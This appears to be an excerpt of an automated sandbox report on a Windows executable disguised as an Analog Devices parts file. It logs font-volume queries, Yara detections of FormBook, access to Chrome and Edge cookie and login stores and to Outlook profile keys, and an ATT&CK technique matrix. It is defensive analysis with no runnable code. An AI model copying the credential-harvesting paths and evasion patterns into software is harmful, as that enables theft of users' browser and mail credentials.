Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

